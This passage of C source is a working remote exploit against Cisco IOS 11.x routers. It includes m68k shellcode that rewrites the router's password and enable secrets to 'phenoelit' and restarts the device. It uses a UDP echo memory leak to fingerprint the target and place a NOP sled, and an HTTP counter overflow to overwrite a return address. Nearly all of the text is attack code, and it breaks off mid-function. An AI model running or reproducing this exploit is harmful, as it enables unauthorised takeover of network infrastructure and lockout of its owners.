"\x4a\x80" //tstl %d0 (0x0000004C)
"\x67\x08" //beqs 58 <next2> (0x0000004E)
"\x28\x40" //moveal %d0,%a4 (0x00000050)
"\x4b\xfa\x00\xc8" //lea %pc@(11c <REPLACE_enable>),%a5 (0x00000052)
"\x61\x50" //bsrs a8 <nvcopy> (0x00000056)
"\x52\x8a" //addql #1,%a2 (0x00000058)
"\x60\xd2" //bras 2e <modmain> (0x0000005A)
"\x32\xbc\x00\x00" //movew #0,%a1@ (0x0000005C)
"\x7e\x01" //moveq #1,%d7 (0x00000060)
"\x2c\x3c\x00\x00\xff\xff" //movel #65535,%d6 (0x00000062)
"\x9d\x47" //subxw %d7,%d6 (0x00000068)
"\x6b\xfc" //bmis 68 <chksm_delay> (0x0000006A)
"\x2a\x48" //moveal %a0,%a5 (0x0000006C)
"\x61\x50" //bsrs c0 <chksum> (0x0000006E)
"\x32\x86" //movew %d6,%a1@ (0x00000070)
"\x7e\x01" //moveq #1,%d7 (0x00000072)
"\x28\x3c\x00\x00\xff\xff" //movel #65535,%d4 (0x00000074)
"\x99\x47" //subxw %d7,%d4 (0x0000007A)
"\x6b\xfc" //bmis 7a <final_delay> (0x0000007C)
"\x46\xfc\x27\x00" //movew #9984,%sr (0x0000007E)
"\x20\x7c\x0f\xf0\x00\x00" //moveal #267386880,%a0 (0x00000082)
"\x2e\x50" //moveal %a0@,%sp (0x00000088)
"\x20\x7c\x0f\xf0\x00\x04" //moveal #267386884,%a0 (0x0000008A)
"\x20\x50" //moveal %a0@,%a0 (0x00000090)
"\x4e\xd0" //jmp %a0@ (0x00000092)
"\x28\x4a" //moveal %a2,%a4 (0x00000094)
"\x0c\x15\x00\x00" //cmpib #0,%a5@ (0x00000096)
"\x67\x08" //beqs a4 <strstr_endofstr> (0x0000009A)
"\xb9\x0d" //cmpmb %a5@+,%a4@+ (0x0000009C)
"\x67\xf6" //beqs 96 <strstr_2> (0x0000009E)
"\x42\x80" //clrl %d0 (0x000000A0)
"\x4e\x75" //rts (0x000000A2)
"\x20\x0c" //movel %a4,%d0 (0x000000A4)
"\x4e\x75" //rts (0x000000A6)
"\x7e\x01" //moveq #1,%d7 (0x000000A8)
"\x0c\x15\x00\x00" //cmpib #0,%a5@ (0x000000AA)
"\x67\x0e" //beqs be <nvcopy_end> (0x000000AE)
"\x18\xdd" //moveb %a5@+,%a4@+ (0x000000B0)
"\x2c\x3c\x00\x00\xff\xff" //movel #65535,%d6 (0x000000B2)
"\x9d\x47" //subxw %d7,%d6 (0x000000B8)
"\x6b\xfc" //bmis b8 <nvcopy_delay> (0x000000BA)
"\x60\xec" //bras aa <nvcopyl1> (0x000000BC)
"\x4e\x75" //rts (0x000000BE)
"\x42\x87" //clrl %d7 (0x000000C0)
"\x42\x80" //clrl %d0 (0x000000C2)
"\x0c\x55\x00\x00" //cmpiw #0,%a5@ (0x000000C4)
"\x66\x0a" //bnes d4 <chk_hack> (0x000000C8)
"\x52\x80" //addql #1,%d0 (0x000000CA)
"\x0c\x80\x00\x00\x00\x0a" //cmpil #10,%d0 (0x000000CC)
"\x67\x08" //beqs dc <chk2> (0x000000D2)
"\x42\x86" //clrl %d6 (0x000000D4)
"\x3c\x1d" //movew %a5@+,%d6 (0x000000D6)
"\xde\x86" //addl %d6,%d7 (0x000000D8)
"\x60\xe8" //bras c4 <chk1> (0x000000DA)
"\x2c\x07" //movel %d7,%d6 (0x000000DC)
"\x2a\x07" //movel %d7,%d5 (0x000000DE)
"\x02\x86\x00\x00\xff\xff" //andil #65535,%d6 (0x000000E0)
"\xe0\x8d" //lsrl #8,%d5 (0x000000E6)
"\xe0\x8d" //lsrl #8,%d5 (0x000000E8)
"\xdc\x45" //addw %d5,%d6 (0x000000EA)
"\x28\x06" //movel %d6,%d4 (0x000000EC)
"\x02\x84\xff\xff\x00\x00" //andil #-65536,%d4 (0x000000EE)
"\x66\x00\xff\xea" //bnew e0 <chk3> (0x000000F4)
"\x46\x46" //notw %d6 (0x000000F8)
"\x4e\x75" //rts (0x000000FA)
"\x0a"" password ""\x00"
"\x0a""enable ""\x00"
"phenoelit\x0a""\x00"
"password phenoelit\x0a""\x00"
;
char modcfg2k5[] =
"\x46\xfc\x27\x00" //movew #9984,%sr (0x00000000)
"\x20\x7c\x02\x00\x00\x00" //moveal #33554432,%a0 (0x00000004)
"\x54\x88" //addql #2,%a0 (0x0000000A)
"\x0c\x50\xab\xcd" //cmpiw #-21555,%a0@ (0x0000000C)
"\x66\xf8" //bnes a <find_magic> (0x00000010)
"\x22\x48" //moveal %a0,%a1 (0x00000012)
"\x58\x89" //addql #4,%a1 (0x00000014)
"\x24\x49" //moveal %a1,%a2 (0x00000016)
"\x50\x8a" //addql #8,%a2 (0x00000018)
"\x50\x8a" //addql #8,%a2 (0x0000001A)
"\x0c\x12\x00\x00" //cmpib #0,%a2@ (0x0000001C)
"\x67\x28" //beqs 4a <end_of_config> (0x00000020)
"\x4b\xfa\x00\xd6" //lea %pc@(fa <S_password>),%a5 (0x00000022)
"\x61\x6a" //bsrs 92 <strstr> (0x00000026)
"\x4a\x80" //tstl %d0 (0x00000028)
"\x67\x08" //beqs 34 <next1> (0x0000002A)
"\x28\x40" //moveal %d0,%a4 (0x0000002C)
"\x4b\xfa\x00\xdf" //lea %pc@(10f <REPLACE_password>),%a5 (0x0000002E)
"\x61\x72" //bsrs a6 <nvcopy> (0x00000032)
"\x4b\xfa\x00\xd0" //lea %pc@(106 <S_enable>),%a5 (0x00000034)
"\x61\x58" //bsrs 92 <strstr> (0x00000038)
"\x4a\x80" //tstl %d0 (0x0000003A)
"\x67\x08" //beqs 46 <next2> (0x0000003C)
"\x28\x40" //moveal %d0,%a4 (0x0000003E)
"\x4b\xfa\x00\xd8" //lea %pc@(11a <REPLACE_enable>),%a5 (0x00000040)
"\x61\x60" //bsrs a6 <nvcopy> (0x00000044)
"\x52\x8a" //addql #1,%a2 (0x00000046)
"\x60\xd2" //bras 1c <modmain> (0x00000048)
"\x42\x80" //clrl %d0 (0x0000004A)
"\x2a\x49" //moveal %a1,%a5 (0x0000004C)
"\x52\x00" //addqb #1,%d0 (0x0000004E)
"\x1a\xfc\x00\x00" //moveb #0,%a5@+ (0x00000050)
"\x7e\x01" //moveq #1,%d7 (0x00000054)
"\x2c\x3c\x00\x00\xff\xff" //movel #65535,%d6 (0x00000056)
"\x9d\x47" //subxw %d7,%d6 (0x0000005C)
"\x6b\xfc" //bmis 5c <chksm_delay> (0x0000005E)
"\x0c\x00\x00\x02" //cmpib #2,%d0 (0x00000060)
"\x66\xe8" //bnes 4e <chksm_del> (0x00000064)
"\x2a\x48" //moveal %a0,%a5 (0x00000066)
"\x61\x54" //bsrs be <chksum> (0x00000068)
"\x2a\x49" //moveal %a1,%a5 (0x0000006A)
"\x52\x8d" //addql #1,%a5 (0x0000006C)
"\x42\x80" //clrl %d0 (0x0000006E)
"\x52\x00" //addqb #1,%d0 (0x00000070)
"\x1a\x86" //moveb %d6,%a5@ (0x00000072)
"\x7e\x01" //moveq #1,%d7 (0x00000074)
"\x28\x3c\x00\x00\xff\xff" //movel #65535,%d4 (0x00000076)
"\x99\x47" //subxw %d7,%d4 (0x0000007C)
"\x6b\xfc" //bmis 7c <final_delay> (0x0000007E)
"\xe0\x4e" //lsrw #8,%d6 (0x00000080)
"\x2a\x49" //moveal %a1,%a5 (0x00000082)
"\x0c\x00\x00\x02" //cmpib #2,%d0 (0x00000084)
"\x66\xe6" //bnes 70 <final_wr> (0x00000088)
"\x20\x7c\x03\x00\x00\x60" //moveal #50331744,%a0 (0x0000008A)
"\x4e\xd0" //jmp %a0@ (0x00000090)
"\x28\x4a" //moveal %a2,%a4 (0x00000092)
"\x0c\x15\x00\x00" //cmpib #0,%a5@ (0x00000094)
"\x67\x08" //beqs a2 <strstr_endofstr> (0x00000098)
"\xb9\x0d" //cmpmb %a5@+,%a4@+ (0x0000009A)
"\x67\xf6" //beqs 94 <strstr_2> (0x0000009C)
"\x42\x80" //clrl %d0 (0x0000009E)
"\x4e\x75" //rts (0x000000A0)
"\x20\x0c" //movel %a4,%d0 (0x000000A2)
"\x4e\x75" //rts (0x000000A4)
"\x7e\x01" //moveq #1,%d7 (0x000000A6)
"\x0c\x15\x00\x00" //cmpib #0,%a5@ (0x000000A8)
"\x67\x0e" //beqs bc <nvcopy_end> (0x000000AC)
"\x18\xdd" //moveb %a5@+,%a4@+ (0x000000AE)
"\x2c\x3c\x00\x00\xff\xff" //movel #65535,%d6 (0x000000B0)
"\x9d\x47" //subxw %d7,%d6 (0x000000B6)
"\x6b\xfc" //bmis b6 <nvcopy_delay> (0x000000B8)
"\x60\xec" //bras a8 <nvcopyl1> (0x000000BA)
"\x4e\x75" //rts (0x000000BC)
"\x42\x87" //clrl %d7 (0x000000BE)
"\x42\x80" //clrl %d0 (0x000000C0)
"\x0c\x55\x00\x00" //cmpiw #0,%a5@ (0x000000C2)
"\x66\x0a" //bnes d2 <chk_hack> (0x000000C6)
"\x52\x80" //addql #1,%d0 (0x000000C8)
"\x0c\x80\x00\x00\x00\x14" //cmpil #20,%d0 (0x000000CA)
"\x67\x08" //beqs da <chk2> (0x000000D0)
"\x42\x86" //clrl %d6 (0x000000D2)
"\x3c\x1d" //movew %a5@+,%d6 (0x000000D4)
"\xde\x86" //addl %d6,%d7 (0x000000D6)
"\x60\xe8" //bras c2 <chk1> (0x000000D8)
"\x2c\x07" //movel %d7,%d6 (0x000000DA)
"\x2a\x07" //movel %d7,%d5 (0x000000DC)
"\x02\x86\x00\x00\xff\xff" //andil #65535,%d6 (0x000000DE)
"\xe0\x8d" //lsrl #8,%d5 (0x000000E4)
"\xe0\x8d" //lsrl #8,%d5 (0x000000E6)
"\xdc\x45" //addw %d5,%d6 (0x000000E8)
"\x28\x06" //movel %d6,%d4 (0x000000EA)
"\x02\x84\xff\xff\x00\x00" //andil #-65536,%d4 (0x000000EC)
"\x66\x00\xff\xea" //bnew de <chk3> (0x000000F2)
"\x46\x46" //notw %d6 (0x000000F6)
"\x4e\x75" //rts (0x000000F8)
"\x0a"" password ""\x00"
"\x0a""enable ""\x00"
"phenoelit\x0a""\x00"
"password phenoelit\x0a""\x00"
;
//
// address selection strategies
//
#define S_RANDOM 1
#define S_LAST 2
#define S_SMALLEST 3
#define S_HIGHEST 4
#define S_FREQUENT 5
typedef struct {
unsigned int a;
unsigned int count;
} addrs_t;
#define LOW_ADDR_THR 5
#define LOW_COUNT_THR 3
//
// IO memory block header based fingerprinting
//
static struct {
unsigned int PC_start;
unsigned int PC_end;
unsigned int IO_start;
unsigned int IO_end;
char *name;
unsigned char *code;
unsigned int codelen;
unsigned char *nop;
unsigned int noplen;
unsigned int fakefp;
} cisco_boxes[] = {
{0x08000000, 0x08ffffff, 0x02C00000, 0x02FFFFFF,
"Cisco 1600 series, run from Flash",
modcfg, sizeof(modcfg)-1,
m68nop, sizeof(m68nop)-1 ,
0x02f0f1f2
},
{0x0208F600, 0x0208F93C, 0x02C00000, 0x02FFFFFF,
"Cisco 1603, 11.3(11b) IP only, run from RAM",
returncode, sizeof(returncode)-1,
m68nop, sizeof(m68nop)-1 ,
0x02f0f1f2
},
{0x03000000, 0x037FFFFF, 0x00E00000, 0x00FFFFFF,
"Cisco 2500 series, run from Flash",
modcfg2k5, sizeof(modcfg2k5)-1,
m68nop, sizeof(m68nop)-1,
0x00079000
},
{0,0,0,0,NULL,NULL,0,NULL,0,0}
};
// ***************** Status and other tracking *******************
//
// HTTP communication
//
struct {
int sfd;
unsigned int done;
} http;
//
// UDP leak
//
#define MAXADDRS 100
#define DEFAULTRUNS 206
#define LOCALPORT 31336 // almost 31337 ;)
#define PACKETMAX 1400
struct {
int sfd;
int udpsfd;
int guess;
addrs_t addrs[MAXADDRS];
unsigned int addrc;
unsigned int lastaddr;
int nop_offset;
int nop_sled;
} leak;
//
// config
//
struct {
char *device;
char *target;
struct in_addr target_addr;
int verbose;
int testmode;
int strategy;
unsigned int leakme;
unsigned int timeout;
unsigned int leakruns;
} cfg;
//
// function prototypes
//
void usage(char *s);
void *smalloc(size_t s);
int HTTPpre(void);
void HTTPsend(char *what);
int IOSlack(unsigned int runs, int shellcode);
unsigned char *UDPecho( unsigned int *plen,
unsigned char *payload, unsigned int payload_len);
void UDPanalyze(unsigned char *b, unsigned int len,
unsigned char *expected, unsigned int expected_length);
unsigned int SelectAddress(void);
int CheckForbidden(unsigned int address);
// *************************** main code *************************
int main(int argc, char **argv) {
//
// HTTP elements
//
char token6[] ="/Cisco";
char token50[]="/AnotherLemmingAndAntoherLemmingAndAnotherLemmingX";
char token48[]="/HereComesTheFinalLemmingAndClosesTheGapForever/";
char httpend[]=" HTTP/1.0\r\n\r\n";
char overflow[30];
//
// stuff we need
//
unsigned int i;
int saved_guess;
unsigned int retaddr;
//
// command line
//
char option;
extern char *optarg;
//
// output stuff
//
double percent;
double lpercent=(double)0;
memset(&cfg,0,sizeof(cfg));
memset(&leak,0,sizeof(leak));
memset(&http,0,sizeof(http));
//
// set defaults
//
cfg.leakme=0x4C00;
cfg.timeout=3;
cfg.leakruns=DEFAULTRUNS;
cfg.strategy=S_SMALLEST;
while ((option=getopt(argc,argv,"vTA:t:L:R:d:i:"))!=EOF) {
switch(option) {
case 'v': cfg.verbose++;
break;
case 'T': cfg.testmode++;
break;
case 'A': cfg.strategy=(int)strtoul(optarg,(char **)NULL,10);
break;
case 't': cfg.timeout=(int)strtoul(optarg,(char **)NULL,10);
break;
case 'L': cfg.leakme=(int)strtoul(optarg,(char **)NULL,10);
break;
case 'R': cfg.leakruns=(int)strtoul(optarg,(char **)NULL,10);
break;
case 'd': {
struct hostent *he;
if ((he=gethostbyname(optarg))==NULL) {
fprintf(stderr,"Could not resolve %s\n",cfg.target);
return (-1);
}
bcopy(he->h_addr,
(char *)&(cfg.target_addr.s_addr),
he->h_length);
cfg.target=smalloc(strlen(optarg)+1);
strcpy(cfg.target,optarg);
}
break;
case 'i': cfg.device=smalloc(strlen(optarg)+1);
strcpy(cfg.device,optarg);
break;
default: usage(argv[0]);
// does not return
}
}
//
// idiot check
//
if ( !(cfg.device && *((u_int32_t *)&(cfg.target_addr)) ))
usage(argv[0]);
//
// verify the UDP leak and make sure it's a known box
//
if (IOSlack(1,-1)!=0) {
fprintf(stderr,"You need an IOS 11.x target with UDP echo service enabled\n"
"for this thing to work. Obviously, you don't have that.\n");
return (1);
}
if (leak.guess==(-1)) {
fprintf(stderr,"Apparently, you got a good target, but it's not one of the\n"
"platforms we got code for. Life sucks.\n");
return (1);
} else {
printf("Target identified as '%s'.\n",cisco_boxes[leak.guess].name);
if (cfg.verbose) {
printf("Using the following code:\n");
hexdump(cisco_boxes[leak.guess].code,
cisco_boxes[leak.guess].codelen);
}
saved_guess=leak.guess;
}
if (leak.lastaddr == 0) {
printf("The memory leak data did not contain enough information to\n"
"calculate the addresses correctly. The router may be busy,\n"
"in which case this method is likely to fail!\n");
return (2);
} else {
printf("Calculated address in test: 0x%08X\n",leak.lastaddr);
}
//
// Connect to HTTP server and send the first "GET "
//
if (HTTPpre()!=0) return 1;
//
// fill normal buffer
//
printf("Sending token50 x 0x5 + token6 ...\n");
HTTPsend(token50);
HTTPsend(token50);
HTTPsend(token50);
HTTPsend(token50);
HTTPsend(token50);
HTTPsend(token6);
//
// send enough data to overflow the counter
//
i=1;
printf("Sending token50 x 0x28F5C28 (2 Gigabytes of data)...\n");
while (i<=0x28F5C28) {
if (!cfg.testmode) HTTPsend(token50);
http.done+=50;
i++;
//
// output
//
percent = (double)http.done / (double)0x80000000;
if ( percent > lpercent+0.0001 ) {
printf("%5.2f%% done\n",percent * 100);
lpercent=percent;
}
}
printf("Sending final token48 ...\n");
HTTPsend(token48);
//
// Use infoleak to transfer code and calculate address
//
memset(&leak,0,sizeof(leak));
if (IOSlack(cfg.leakruns,saved_guess)!=0) {
fprintf(stderr,"Your target does no longer leak memory. This could have\n"
"several reasons, but it sure prevents you from exploiting it.\n");
return (-1);
} else {
printf("Aquired %u addresses with our code\n",leak.addrc);
if (leak.addrc<LOW_ADDR_THR) {
printf( "WARNING: This is a low number of addresses.\n"
" The target is probably busy!!\n");
}
}
if (saved_guess!=leak.guess)
printf("Errrmmm... your target type changed. Just so you know, \n"
"it's not supposed to do that\n");
//
// prepare the overflow buffer
//
printf("Selecting address, using nop sled of %u and offset in the sled of %u\n",
leak.nop_sled, leak.nop_offset);
if ( (retaddr=SelectAddress()) == 0) return (-1);
memset(&overflow,0,sizeof(overflow));
sprintf(overflow,
"BB%%%02X%%%02X%%%02X%%%02X%%%02X%%%02X%%%02X%%%02X"
,
(unsigned char)( (cisco_boxes[saved_guess].fakefp>>24)&0xFF),
(unsigned char)( (cisco_boxes[saved_guess].fakefp>>16)&0xFF),
(unsigned char)( (cisco_boxes[saved_guess].fakefp>> 8)&0xFF),
(unsigned char)( (cisco_boxes[saved_guess].fakefp )&0xFF),
(unsigned char)( (retaddr>>24)&0xFF),
(unsigned char)( (retaddr>>16)&0xFF),
(unsigned char)( (retaddr>> 8)&0xFF),
(unsigned char)( (retaddr )&0xFF));
if (cfg.verbose) hexdump(overflow,sizeof(overflow)-1);
//
// perform overflow and overwrite return address
//
printf("Sending overflow of %u bytes\n",strlen(overflow));
HTTPsend(overflow);
printf("Sending final HTTP/1.0\n");
HTTPsend(httpend);
close(http.sfd);
//
// all done
//
return 0;
}
void usage(char *s) {
fprintf(stderr,"Usage: %s -i <interface> -d <target> [-options]\n",s);
fprintf(stderr,"Options are:\n"
"-v Verbose mode.\n"
"-T Test mode, don't really exploit\n"
"-An Address selection strategy. Values are:\n"
" 1 (random), 2 (last), 3 (smallest), 4 (highest), 5 (most frequent)\n"
"-tn Set timeout for info leak to n seconds\n"
"-Ln Set requested memory leak to n bytes\n"
"-Rn Set number of final leak runs to n\n"
);
exit (1);
}
//
// *********************** HTTP related **************************
//
int HTTPpre(void) {
char get[] = "GET ";
struct sockaddr_in sin;
struct hostent *he;
memset(&sin,0,sizeof(struct sockaddr_in));
if ((he=gethostbyname(cfg.target))==NULL) {
fprintf(stderr,"Could not resolve %s\n",cfg.target);
return (-1);
}
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
bcopy(he->h_addr,(char *)&sin.sin_addr,he->h_length);
bzero(&(sin.sin_zero),8);
if ((http.sfd=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP) )<0) {
fprintf(stderr,"socket(TCP) error\n");
return(-1);
}
printf("Connecting to HTTP server on %s ...\n",cfg.target);
if (connect(http.sfd,(struct sockaddr *)&sin,sizeof(sin))<0) {
fprintf(stderr,"Failed to connect to HTTP\n");
return (-1);
}
printf("Connected!\n");
//
// send "GET "
//
HTTPsend(get);
return 0;
}
void HTTPsend(char *what) {
if (send(http.sfd,what,strlen(what),0)<0) {
fprintf(stderr,"send() failed!\n");
exit(-1);
}
}
//
// *********************** UDP related **************************
//
int IOSlack(unsigned int runs, int shellcode) {
//
// the leak packet
//
#define DUMMY_SIZE 512
unsigned char *packet;
unsigned int length;
char dummy[DUMMY_SIZE];
unsigned char *sc,*st;
unsigned int sclen;
//
// recv stuff
//
char *rbuf;
unsigned int rx;
//
// doing the stuff
//
unsigned int r;
struct sockaddr_in frm;
int frmlen=sizeof(struct sockaddr_in);
fd_set rfds;
struct timeval tv;
int select_ret;
int recvflag;
struct sockaddr_in myself;
//
// init
//
leak.guess=(-1);
r=runs;
recvflag=0;
st=NULL;
//
// get the sockets
//
if ( (leak.sfd=init_socket_IP4(cfg.device,1)) == (-1) ) {
fprintf(stderr,"Couldn't grab a raw socket\n");
return (-1);
}
myself.sin_family=AF_INET;
myself.sin_port=htons(LOCALPORT);
myself.sin_addr.s_addr=INADDR_ANY;
if ( (leak.udpsfd=socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP )) <0) {
fprintf(stderr,"Couldn't grab a UDP socket\n");
return (-1);
}
if ( bind(leak.udpsfd,(struct sockaddr *)&myself,sizeof(struct sockaddr)) != 0) {
fprintf(stderr,"bind() failed\n");
return (-1);
}
//
// determine packet contents and make a packet
//
if (shellcode==(-1)) {
memset(&dummy,0x50,DUMMY_SIZE-1);
dummy[DUMMY_SIZE-1]=0x00;
sc=dummy;
sclen=DUMMY_SIZE-1;
} else {
unsigned char *t;
unsigned int i;
t=sc=st=smalloc(PACKETMAX);
//
// calculate the remaining space for nops
//
leak.nop_sled=PACKETMAX-cisco_boxes[shellcode].codelen;
//
// align
//
while ( (leak.nop_sled % cisco_boxes[shellcode].noplen) != 0)
leak.nop_sled--;
for (i=0;i< (leak.nop_sled/cisco_boxes[shellcode].noplen) ;i++) {
memcpy(t,cisco_boxes[shellcode].nop,cisco_boxes[shellcode].noplen);
t+=cisco_boxes[shellcode].noplen;
}
//
// add the real code
//
memcpy(t,cisco_boxes[shellcode].code,cisco_boxes[shellcode].codelen);
t+=cisco_boxes[shellcode].codelen;
sclen=leak.nop_sled + cisco_boxes[shellcode].codelen;
//
// calculate a nop_offset and align
//
leak.nop_offset=leak.nop_sled * 0.8;
while ( (leak.nop_offset % cisco_boxes[shellcode].noplen) != 0)
leak.nop_offset--;
if (cfg.verbose) hexdump(st,sclen);
}
packet=UDPecho(&length,sc,sclen);
//
// allocate receive buffer
//
rbuf=smalloc(cfg.leakme+0x200);
//
// do it
//
printf("Getting IO memory leak data (%u times) ...\n",r);
while (r--) {
sendpack_IP4(leak.sfd,packet,length);
tv.tv_sec=cfg.timeout;
tv.tv_usec=0;
FD_ZERO(&rfds);
FD_SET(leak.udpsfd,&rfds);
select_ret=select(leak.udpsfd+1,&rfds,NULL,NULL,&tv);
if (select_ret>0) {
rx=recvfrom(leak.udpsfd,rbuf,cfg.leakme,0,(struct sockaddr *)&frm,&frmlen);
if (rx<0) {
fprintf(stderr,"UDP recvfrom() failed\n");
return (-1);
}
if (cfg.verbose) printf("Received %u bytes data\n",rx);
if (cfg.verbose>1) hexdump(rbuf,rx);
recvflag=1;
//
// analyze what we got
//
UDPanalyze(rbuf,rx,sc,sclen);
} else {
printf("Timeout at %u - may be lost packet?\n",r);
}
}
//
// clean up
//
free(packet);
free(rbuf);
if (st!=NULL) free(st);
close(leak.sfd);
close(leak.udpsfd);
if (cfg.verbose==0) printf("\n"); // be nice
if (recvflag) { return 0; } else { return 1; }
}
unsigned char *UDPecho(
unsigned int *plen, // returned length of packet
unsigned char *payload, // pointer to payload
unsigned int payload_len // length of payload
) {
unsigned char *pack;
iphdr_t *ip;
udphdr_t *udp;
u_char *pay;
u_char *t;
u_int16_t cs;
*plen=sizeof(iphdr_t)+sizeof(udphdr_t)+payload_len ;
pack=smalloc(*plen+10);
ip=(iphdr_t *)pack;
ip->version=4;
ip->ihl=sizeof(iphdr_t)/4;
ip->ttl=0x80;
ip->protocol=IPPROTO_UDP;
memcpy(&(ip->saddr.s_addr),&(packet_ifconfig.ip.s_addr),IP_ADDR_LEN);
memcpy(&(ip->daddr.s_addr),&(cfg.target_addr),IP_ADDR_LEN);
udp=(udphdr_t *)((void *)ip+sizeof(iphdr_t));
udp->sport=htons(LOCALPORT);
udp->dport=htons(7);
udp->length=htons(cfg.leakme);
pay=(u_char *)((void *)udp+sizeof(udphdr_t));
t=pay;
memcpy(pay,payload,payload_len);
t+=payload_len;
ip->tot_len=htons(*plen);
cs=chksum((u_char *)ip,sizeof(iphdr_t));
ip->check=cs;
if (cfg.verbose>1) hexdump(pack,*plen);
return pack;
}
void UDPanalyze(unsigned char *b, unsigned int len,
unsigned char *expected, unsigned int expected_length) {
#define ST_MAGIC 1
#define ST_PID 2
#define ST_CHECK 3
#define ST_NAME 4
#define ST_PC 5
#define ST_NEXT 6
#define ST_PREV 7
#define ST_SIZE 8
#define ST_REF 9
#define ST_LASTDE 10
#define ST_ID_ME_NOW 100
unsigned char *p;
int state=0;
int i=0;
unsigned char *opcode_begin;
unsigned char *block2_next_field;
unsigned int block3_next_val;
unsigned int p_name;
unsigned int p_pc;
unsigned int p_next;
unsigned int p_prev;
opcode_begin=NULL;
block2_next_field=NULL;
block3_next_val=0;
if ((!memcmp(b,expected,expected_length))) {
if (cfg.verbose>1) printf("Payload found!\n");
opcode_begin=b;
}
p=b;
while ((b+len-4)>p) {
if ( (p[0]==0xfd) && (p[1]==0x01) && (p[2]==0x10) && (p[3]==0xDF) ) {
if (cfg.verbose>1) printf("REDZONE MATCH!\n");
else { printf("!"); fflush(stdout); }
state=ST_MAGIC;
p+=4;
}
switch (state) {
case ST_MAGIC:
if (cfg.verbose)
printf("MEMORY BLOCK\n");
state++;
p+=4;
break;
case ST_PID:
if (cfg.verbose)
printf("\tPID : %08X\n",ntohl(*(unsigned int *)p));
state++;
p+=4;
break;
case ST_CHECK:
if (cfg.verbose)
printf("\tAlloc Check: %08X\n",ntohl(*(unsigned int *)p));
state++;
p+=4;
break;
case ST_NAME:
p_name=ntohl(*(unsigned int *)p);
if (cfg.verbose)
printf("\tAlloc Name : %08X\n",p_name);
state++;
p+=4;
break;
case ST_PC:
p_pc=ntohl(*(unsigned int *)p);
if (cfg.verbose)
printf("\tAlloc PC : %08X\n",p_pc);
state++;
p+=4;
break;
case ST_NEXT:
p_next=ntohl(*(unsigned int *)p);
if (cfg.verbose)
printf("\tNEXT Block : %08X\n",p_next);
if (block2_next_field==NULL) {
if (cfg.verbose) printf("Assigning as block2_next_field\n");
block2_next_field=p;
} else if (block3_next_val==0) {
if (cfg.verbose) printf("Assigning as block3_next_val\n");
block3_next_val=p_next;
}
state++;
p+=4;
break;
case ST_PREV:
p_prev=ntohl(*(unsigned int *)p);
if (cfg.verbose)
printf("\tPREV Block : %08X\n",p_prev);
state++;
p+=4;
break;
case ST_SIZE:
if (cfg.verbose)
printf("\tBlock Size : %8u words",
ntohl(*(unsigned int *)p)&0x7FFFFFFF);
if (ntohl(*(unsigned int *)p)&0x80000000) {
if (cfg.verbose)
printf(" (Block in use)\n");
} else {
if (cfg.verbose)
printf(" (Block NOT in use)\n");
}
state++;
p+=4;
break;
case ST_REF:
if (cfg.verbose)
printf("\tReferences : %8u\n",ntohl(*(unsigned int *)p));
state++;
p+=4;
break;
case ST_LASTDE:
if (cfg.verbose)
printf("\tLast DeAlc : %08X\n",ntohl(*(unsigned int *)p));
state=ST_ID_ME_NOW;
p+=4;
break;
//
// Identification
//
case ST_ID_ME_NOW:
i=0;
while ((leak.guess==-1)&&(cisco_boxes[i].name!=NULL)) {
if (
(p_name>=cisco_boxes[i].PC_start) &&
(p_name<=cisco_boxes[i].PC_end) &&
(p_pc>=cisco_boxes[i].PC_start) &&
(p_pc<=cisco_boxes[i].PC_end) &&
(p_next>=cisco_boxes[i].IO_start) &&
(p_next<=cisco_boxes[i].IO_end) &&
(p_prev>=cisco_boxes[i].IO_start) &&
(p_prev<=cisco_boxes[i].IO_end)
) {
leak.guess=i;
break;
}
i++;
}
state=0;
p+=4;
break;
default:
p+=1;
}
}
if ( (opcode_begin!=NULL) && (block2_next_field!=NULL) && (block3_next_val!=0) ) {
unsigned int delta;
unsigned int a;
unsigned int i;
int flag=0;
delta=(unsigned int)((void*)block2_next_field - (void*)opcode_begin);
a=block3_next_val-delta;
if (cfg.verbose) {
printf("\n");
printf("Delta between opcode_begin (%p) "
"and block2_next_field (%p) is %u\n",
(void*)block2_next_field, (void*)opcode_begin, delta);
printf("The third block is at 0x%08X\n", block3_next_val);
printf("Therefore, the code should be located at 0x%08X\n",a);
}
for (i=0;i<leak.addrc;i++) {
if (leak.addrs[i].a==a) {
leak.addrs[i].count++;
flag++;
break;
}
}
if ((flag==0)&&(leak.addrc<MAXADDRS-1)) {
leak.addrs[leak.addrc++].a=a;
leak.addrs[leak.addrc].count=1;
leak.lastaddr=a;
}
}
}
unsigned int SelectAddress(void) {
unsigned int the_address;
int rnd_addr;
unsigned int i,j;
addrs_t atmp;
addrs_t consider[MAXADDRS];
unsigned int consc=0;
if (leak.addrc==0) {
fprintf(stderr,"ERROR: No addresses available. Unable to recover\n");
return 0;
}
for (i=0;i<leak.addrc;i++)
printf(" Address 0x%08X (%u times)\n",
leak.addrs[i].a,
leak.addrs[i].count);
//
// put addresses to consider in another array.
// We only want those above our threshold, to prevent irregular buffers
//
memset(&consider,0,sizeof(consider));
for (i=0;i<leak.addrc;i++) {
if (leak.addrs[i].count<LOW_COUNT_THR) {
printf("Address 0x%08X count below threshold\n",
leak.addrs[i].a);
continue;
}
consider[consc]=leak.addrs[i];
consc++;
}
//
// bubble sort addresses, unless we are operating count based, where we
// sort by times of appearences
//
if (cfg.strategy != S_FREQUENT) {
for (i=0;i<consc-1;i++) {
for (j=0;j<(consc-1-i);j++) {
if (consider[j+1].a < consider[j].a) {
atmp=consider[j];
consider[j] = consider[j+1];
consider[j+1] = atmp;
}
}
}
} else {
for (i=0;i<consc-1;i++) {
for (j=0;j<(consc-1-i);j++) {
if (consider[j+1].count < consider[j].count) {
atmp=consider[j];
consider[j] = consider[j+1];
consider[j+1] = atmp;
}
}
}
}
printf("Cleaned up, remaining addresses %u\n",consc);
if (consc==0) {
fprintf(stderr,"ERROR: No addresses left. Unable to recover\n"
"You can try to decrease LOW_COUNT_THR in the source\n");
return 0;
}
for (i=0;i<consc;i++)
printf(" Address 0x%08X (%u times)\n",
consider[i].a,
consider[i].count);
switch (cfg.strategy) {
case S_RANDOM:
{
srand((unsigned long)time(NULL));
rnd_addr=(int)(((float)consc-1)*rand()/(RAND_MAX+1.0));
the_address=consider[rnd_addr].a + leak.nop_offset;
printf("Use pseudo-randomly selected address 0x%08X (0x%08X)\n",
the_address,consider[rnd_addr].a);
}
break;
case S_LAST:
{
the_address=leak.lastaddr + leak.nop_offset;
printf("Using last address 0x%08X\n",the_address);
}
break;
case S_SMALLEST:
{
